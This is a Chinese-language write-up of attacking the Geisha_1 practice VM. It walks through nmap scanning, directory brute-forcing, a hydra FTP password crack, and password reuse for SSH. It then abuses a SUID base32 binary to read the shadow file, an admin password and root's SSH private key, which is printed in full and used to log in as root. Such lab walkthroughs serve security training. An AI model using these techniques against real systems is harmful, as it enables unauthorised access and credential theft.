Geisha_1 靶机

信息收集

┌──(kali㉿kali)-[~/Downloads/Geisha_1]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.145                                                    
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-29 22:52 EDT
Nmap scan report for 192.1.1.145
Host is up (0.00011s latency).
Not shown: 65528 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
7080/tcp open  empowerid
7125/tcp open  unknown
8088/tcp open  radan-http
9198/tcp open  unknown
MAC Address: 00:0C:29:B4:24:08 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 10.59 seconds

开放端口比较多，兔子洞概率较大

┌──(kali㉿kali)-[~/Downloads/Geisha_1]
└─$ sudo nmap -sT -sV -sC -O -p21,22,80,7080,7125,8088,9198 192.1.1.145
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-29 22:56 EDT
Nmap scan report for 192.1.1.145
Host is up (0.00026s latency).

PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      vsftpd 3.0.3
22/tcp   open  ssh      OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 1b:f2:5d:cd:89:13:f2:49:00:9f:8c:f9:eb:a2:a2:0c (RSA)
|   256 31:5a:65:2e:ab:0f:59:ab:e0:33:3a:0c:fc:49:e0:5f (ECDSA)
|_  256 c6:a7:35:14:96:13:f8:de:1e:e2:bc:e7:c7:66:8b:ac (ED25519)
80/tcp   open  http     Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Geisha
7080/tcp open  ssl/http LiteSpeed httpd
|_http-server-header: LiteSpeed
| ssl-cert: Subject: commonName=geisha/organizationName=webadmin/countryName=US
| Not valid before: 2020-05-09T14:01:34
|_Not valid after:  2022-05-09T14:01:34
| tls-alpn: 
|   h2
|   spdy/3
|   spdy/2
|_  http/1.1
|_http-title: Geisha
|_ssl-date: TLS randomness does not represent time
7125/tcp open  http     nginx 1.17.10
|_http-title: Geisha
|_http-server-header: nginx/1.17.10
8088/tcp open  http     LiteSpeed httpd
|_http-server-header: LiteSpeed
|_http-title: Geisha
9198/tcp open  http     SimpleHTTPServer 0.6 (Python 2.7.16)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.16
|_http-title: Geisha
MAC Address: 00:0C:29:B4:24:08 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.05 seconds

信息比较杂乱，先把三板斧走完

┌──(kali㉿kali)-[~/Downloads/Geisha_1]
└─$ sudo nmap --script=vuln -p21,22,80,7080,7125,8088,9198 192.1.1.145
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-29 22:57 EDT
Nmap scan report for 192.1.1.145
Host is up (0.00025s latency).

PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
| http-enum: 
|_  /info.php: Possible information file
7080/tcp open  empowerid
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
| http-litespeed-sourcecode-download: 
| Litespeed Web Server Source Code Disclosure (CVE-2010-2333)
| /index.php source code:
| <html><head><title>400 Bad Request</title></head><body>
| <h2>HTTPS is required</h2>
| <p>This is an SSL protected page, please use the HTTPS scheme instead of the plain HTTP scheme to access this URL.<br />
| <blockquote>Hint: The URL should starts with <b>https</b>://</blockquote> </p>
| <hr />
| Powered By LiteSpeed Web Server<br />
| <a href='http://www.litespeedtech.com'><i>http://www.litespeedtech.com</i></a>
|_</body></html>
|_http-vuln-cve2013-7091: ERROR: Script execution failed (use -d to debug)
|_http-passwd: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server\'s resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
7125/tcp open  unknown
8088/tcp open  radan-http
| http-enum: 
|_  /info.php: Possible information file
9198/tcp open  unknown
MAC Address: 00:0C:29:B4:24:08 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 331.59 seconds

有效信息并不多，汇总一下

21 ftp 
22 ssh 
80 Apache 
7080 LiteSpeed
7125 nginx
8080 LiteSpeed
9198 SimpleHTTPServer

先尝试了一下 ftp 匿名登录（其实 nmap 脚本扫描会对 ftp 匿名登录进行检测），失败

尝试逐个目录爆破，在 7125 端口发现了 /passwd 目录

┌──(kali㉿kali)-[~/Downloads/Geisha_1]
└─$ sudo dirsearch -u http://192.1.1.145:7125  
[sudo] password for kali: 

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                    
 (_||| _) (/_(_|| (_| )                                                                                             
                                                                                                                    
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.1.1.145-7125/_23-08-30_02-54-18.txt

Error Log: /root/.dirsearch/logs/errors-23-08-30_02-54-18.log

Target: http://192.1.1.145:7125/

[02:54:18] Starting: 
[02:54:37] 200 -  175B  - /index.php                                        
[02:54:37] 200 -  175B  - /index.php/login/                                 
[02:54:42] 200 -    1KB - /passwd

第一反应是有没有可能是文件包含漏洞，尝试了一下并不是，不过访问/shadow 时返回结果是 403。passwd 文件内容如下

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
geisha:x:1000:1000:geisha,,,:/home/geisha:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
lsadm:x:998:1001::/:/sbin/nologin

得到了一个用户名 geisha

FTP 爆破

尝试 ftp 爆破

┌──(kali㉿kali)-[~/Downloads/Geisha_1]
└─$ sudo hydra -l geisha -P /usr/share/seclists/Passwords/darkweb2017-top10000.txt 192.1.1.145 ftp
[sudo] password for kali: 
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-29 22:54:37
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 9999 login tries (l:1/p:9999), ~625 tries per task
[DATA] attacking ftp://192.1.1.145:21/
[21][ftp] host: 192.1.1.145   login: geisha   password: letmein
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-29 22:55:33

使用该密码登录 ftp 成功，进行了简单的文件收集

密码重用登录ssh

尝试了一下 ssh 密码是否和 ftp 密码相同

geisha@geisha:~$ sudo -l
[sudo] password for geisha: 
Sorry, user geisha may not run sudo on geisha.
geisha@geisha:~$ uname -a
Linux geisha 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1+deb10u1 (2020-04-27) x86_64 GNU/Linux
geisha@geisha:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:b4:24:08 brd ff:ff:ff:ff:ff:ff
    inet 192.1.1.145/24 brd 192.1.1.255 scope global dynamic ens33
       valid_lft 1779sec preferred_lft 1779sec
    inet6 fe80::20c:29ff:feb4:2408/64 scope link 
       valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:b0:73:a4:a9 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
4: br-c987d2b66beb: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:ee:8e:c2:ab brd ff:ff:ff:ff:ff:ff
    inet 172.18.0.1/16 brd 172.18.255.255 scope global br-c987d2b66beb
       valid_lft forever preferred_lft forever
    inet6 fe80::42:eeff:fe8e:c2ab/64 scope link 
       valid_lft forever preferred_lft forever
1146: vethfb3bc15@if1145: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-c987d2b66beb state UP group default 
    link/ether 6a:c7:c5:c3:8c:15 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::68c7:c5ff:fec3:8c15/64 scope link 
       valid_lft forever preferred_lft forever
1148: vethb95d0a1@if1147: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-c987d2b66beb state UP group default 
    link/ether aa:f4:7a:20:c8:c9 brd ff:ff:ff:ff:ff:ff link-netnsid 1
    inet6 fe80::a8f4:7aff:fe20:c8c9/64 scope link 
       valid_lft forever preferred_lft forever
geisha@geisha:~$ id
uid=1000(geisha) gid=1000(geisha) groups=1000(geisha),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

登录成功

提权

开始考虑如何提权

geisha@geisha:~$ find / -type f -perm -04000 -ls 2>/dev/null
  1972743    428 -rwsr-xr-x   1 root     root       436552 Jan 31  2020 /usr/lib/openssh/ssh-keysign
  1972645     52 -rwsr-xr--   1 root     messagebus    51184 Jun  9  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
  2359743     12 -rwsr-xr-x   1 root     root          10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
  1969427     44 -rwsr-xr-x   1 root     root          44440 Jul 27  2018 /usr/bin/newgrp
  1966119     64 -rwsr-xr-x   1 root     root          63736 Jul 27  2018 /usr/bin/passwd
  1969808     36 -rwsr-xr-x   1 root     root          34888 Jan 10  2019 /usr/bin/umount
  1969565     64 -rwsr-xr-x   1 root     root          63568 Jan 10  2019 /usr/bin/su
  1966116     44 -rwsr-xr-x   1 root     root          44528 Jul 27  2018 /usr/bin/chsh
  1967637     44 -rwsr-sr-x   1 root     root          43712 Feb 28  2019 /usr/bin/base32
  1967184    156 -rwsr-xr-x   1 root     root         157192 Feb  2  2020 /usr/bin/sudo
  1966118     84 -rwsr-xr-x   1 root     root          84016 Jul 27  2018 /usr/bin/gpasswd
  1966115     56 -rwsr-xr-x   1 root     root          54096 Jul 27  2018 /usr/bin/chfn
  1969806     52 -rwsr-xr-x   1 root     root          51280 Jan 10  2019 /usr/bin/mount

看到 base32 是 SUID，看来可以实现任意文件读取，尝试读取了 shadow 文件，但是爆破不出来 root 的密码

接下来我尝试了检查定时任务、passwd 和 shadow 文件权限、linpeas 结果汇总

21 ftp geisha:letmein
22 ssh geisha:letmein
80 Apache  /var/www/html
7080 LiteSpeed /usr/local/lsws/admin/html

7125 /opt/nginx/www
9198 root python -m SimpleHTTPServer 9198

# 利用base32读取了adminpasswd文件
base32 /usr/local/lsws/adminpasswd | base32 --decode
WebAdmin user/password is admin/NTk4MTQ3

docker-containerd-shim -namespace moby -workdir /var/lib/docker/containerd/daemon/io.containerd.runtime.v1.linux/moby/d53b34acf079c584129574b2b1925ff972ccc0762b53a872daa55704c2913f9e -address /var/run/docker/containerd/containerd.sock -containerd-binary /usr/bin/docker-containerd -runtime-root /var/run/docker/runtime-runc

尝试使用得到的密码进行 john 爆破，失败

由于没有 gcc，所以没考虑内核提权，在这里卡了很久。原本以为的思路是：网站某个路径是可以通过 admin/NTk4MTQ3 来登录进去，或许上传的文件默认是 root 权限，进而反弹 shell 提权。但是并没有找到这样的路径

base32 SUID 读取 .ssh 文件夹中的敏感文件

最后看了 WP，发现是利用 base32 可以实现任意文件读取的特点，尝试读取 root 目录下的 .ssh 文件夹中的敏感文件。这个确实没考虑到，我倒是尝试了直接读取 flag 是成功的（尝试了 root.txt 和 flag.txt）

geisha@geisha:/etc/ssh$ base32 /root/root.txt | base32 --decode
base32: /root/root.txt: No such file or directory
geisha@geisha:/etc/ssh$ base32 /root/flag.txt | base32 --decode
Flag{Sun_CTF_220_5_G31sha}
geisha@geisha:/etc/ssh$ base32 /root/.ssh/id_rsa | base32 --decode
-----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEA43eVw/8oSsnOSPCSyhVEnt01fIwy1YZUpEMPQ8pPkwX5uPh4
OZXrITY3JqYSCFcgJS34/TQkKLp7iG2WGmnno/Op4GchXEdSklwoGOKNA22l7pX5
89FAL1XSEBCtzlrCrksvfX08+y7tS/I8s41w4aC1TDd5o8c1Kx5lfwl7qw0ZMlbd
5yeAUhuxuvxo/KFqiUUfpcpoBf3oT2K97/bZr059VU8T4wd5LkCzKEKmK5ebWIB6
fgIfxyhEm/o3dl1lhegTtzC6PtlhuT7ty//mqEeMuipwH3ln61fHXs72LI/vTx26
TSSmzHo8zZt+/lwrgroh0ByXbCtDaZjo4HAFfQIDAQABAoIBAQCRXy/b3wpFIcww
WW+2rvj3/q/cNU2XoQ4fHKx4yqcocz0xtbpAM0veIeQFU0VbBzOID2V9jQE+9k9U
1ZSEtQJRibwbqk1ryDlBSJxnqwIsGrtdS4Q/CpBWsCZcFgy+QMsC0RI8xPlgHpGR
Y/LfXZmy2R6E4z9eKEYWlIqRMeJTYgqsP6ZR4SOLuZS1Aq/lq/v9jqGs/SQenjRb
8zt1BoqCfOp5TtY1NoBLqaPwmDt8+rlQt1IM+2aYmxdUkLFTcMpCGMADggggtnR+
10pZkA6wM8/FlxyAFcNwt+H3xu5VKuQKdqTfh1EuO3c34UmuS1qnidHO1rYWOhYO
jceQYzoBAoGBAP/Ml6cp2OWqrheJS9Pgnvz82n+s9yM5raKNnH57j0sbEp++eG7o
2po5/vrLBcCHGqZ7+RNFXDmRBEMToru/m2RikSVYk8QHLxVZJt5iB3tcxmglGJj/
cLkGM71JqjHX/edwu2nNu14m4l1JV9LGvvHR5m6uU5cQvdcMTsRpkuxdAoGBAOOl
THxiQ6R6HkOt9w/WrKDIeGskIXj/P/79aB/2p17M6K+cy75OOYzqkDPENrxK8bub
RaTzq4Zl2pAqxvsv/CHuJU/xHs9T3Ox7A1hWqnOOk2f0KBmhQTYBs2OKqXXZotHH
xvkOgc0fqRm1QYlCK2lyBBM14O5Isud1ZZXLUOuhAoGBAIBds1z36xiV5nd5NsxE
1IQwf5XCvuK2dyQz3Gy8pNQT6eywMM+3mrv6jrJcX66WHhGd9QhurjFVTMY8fFWr
edeOfzg2kzC0SjR0YMUIfKizjf2FYCqnRXIUYrKC3R3WPlx+fg5CZ9x/tukJfUEQ
65F+vBye7uPISvw3+O8n68shAoGABXMyppOvrONjkBk9Hfr0vRCvmVkPGBd8T71/
XayJC0L6myG02wSCajY/Z43eBZoBuY0ZGL7gr2IG3oa3ptHaRnGuIQDTzQDj/CFh
zh6dDBEwxD9bKmnq5sEZq1tpfTHNrRoMUHAheWi1orDtNb0Izwh0woT6spm49sOf
v/tTH6ECgYEA/tBeKSVGm0UxGrjpQmhW/9Po62JNz6ZBaTELm3paaxqGtA+0HD0M
OuzD6TBG6zBF6jW8VLQfiQzIMEUcGa8iJXhI6bemiX6Te1PWC8NMMULhCjObMjCv
bf+qz0sVYfPb95SQb4vvFjp5XDVdAdtQov7s7XmHyJbZ48r8ISHm98s=
-----END RSA PRIVATE KEY-----

┌──(kali㉿kali)-[~/Downloads/Geisha_1]
└─$ vim rsakey               


┌──(kali㉿kali)-[~/Downloads/Geisha_1]
└─$ chmod 600 rsakey


┌──(kali㉿kali)-[~/Downloads/Geisha_1]
└─$ ssh -i rsakey root@192.1.1.145                                                                
Linux geisha 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1+deb10u1 (2020-04-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat May  9 12:03:57 2020 from 192.168.1.21
root@geisha:~# cd /root
root@geisha:~# ls
flag.txt
root@geisha:~# whoami
root
root@geisha:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:b4:24:08 brd ff:ff:ff:ff:ff:ff
    inet 192.1.1.145/24 brd 192.1.1.255 scope global dynamic ens33
       valid_lft 1138sec preferred_lft 1138sec
    inet6 fe80::20c:29ff:feb4:2408/64 scope link 
       valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:b0:73:a4:a9 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
4: br-c987d2b66beb: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:ee:8e:c2:ab brd ff:ff:ff:ff:ff:ff
    inet 172.18.0.1/16 brd 172.18.255.255 scope global br-c987d2b66beb
       valid_lft forever preferred_lft forever
    inet6 fe80::42:eeff:fe8e:c2ab/64 scope link 
       valid_lft forever preferred_lft forever
1590: vethdb2139e@if1589: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-c987d2b66beb state UP group default 
    link/ether 92:cf:34:bd:2d:e9 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::90cf:34ff:febd:2de9/64 scope link 
       valid_lft forever preferred_lft forever
1592: veth4a06cb7@if1591: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-c987d2b66beb state UP group default 
    link/ether 4a:d7:e0:f7:06:23 brd ff:ff:ff:ff:ff:ff link-netnsid 1
    inet6 fe80::48d7:e0ff:fef7:623/64 scope link 
       valid_lft forever preferred_lft forever
root@geisha:~# uname -a
Linux geisha 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1+deb10u1 (2020-04-27) x86_64 GNU/Linux

这里如果想不到这个思路，可以翻一翻 autowords 来考虑读取哪些敏感文件